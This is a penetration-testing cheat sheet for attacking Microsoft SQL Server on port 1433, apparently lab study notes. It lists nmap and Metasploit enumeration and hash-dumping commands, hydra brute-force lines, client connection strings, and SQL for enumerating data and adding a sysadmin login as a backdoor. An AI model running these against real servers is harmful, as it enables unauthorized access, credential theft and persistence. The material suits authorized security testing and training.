Ms-SQL 1433

To search for related scripts, look for

nmap --script-help "ms and sql"

#Nmap

#one liner
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.11.1.13

nmap --script ms-sql-info -p 1433 10.0.0.0
nmap --script ms-sql-config -p 1433 10.0.0.0
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 10.0.0.0
nmap --script ms-sql-* -p 1433 10.0.0.0 

#Metasploit

msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

#Bruteforcing

hydra -L usernames.txt –p password 10.0.0.0 mssql
hydra -l username –P passwords.txt 10.0.0.0 mssql

#Connect

# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database

#Commands

# Get all users
> SELECT * FROM sys.database_principals

# Switch to the database
> USE <database>

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>

# Get the version of MSSQL
> SELECT @@version

# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# Get current username
> SELECT user_name()